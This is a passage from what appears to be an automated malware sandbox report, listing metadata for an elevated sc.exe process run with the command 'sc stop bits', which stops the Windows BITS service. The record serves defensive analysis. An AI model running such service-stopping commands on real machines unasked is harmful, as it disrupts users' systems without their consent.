                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Target ID:50
                                      Start time:13:30:09
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop bits
                                      Imagebase:0x7ff6a9a90000
                                      File size:69120 bytes
                                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      No disassembly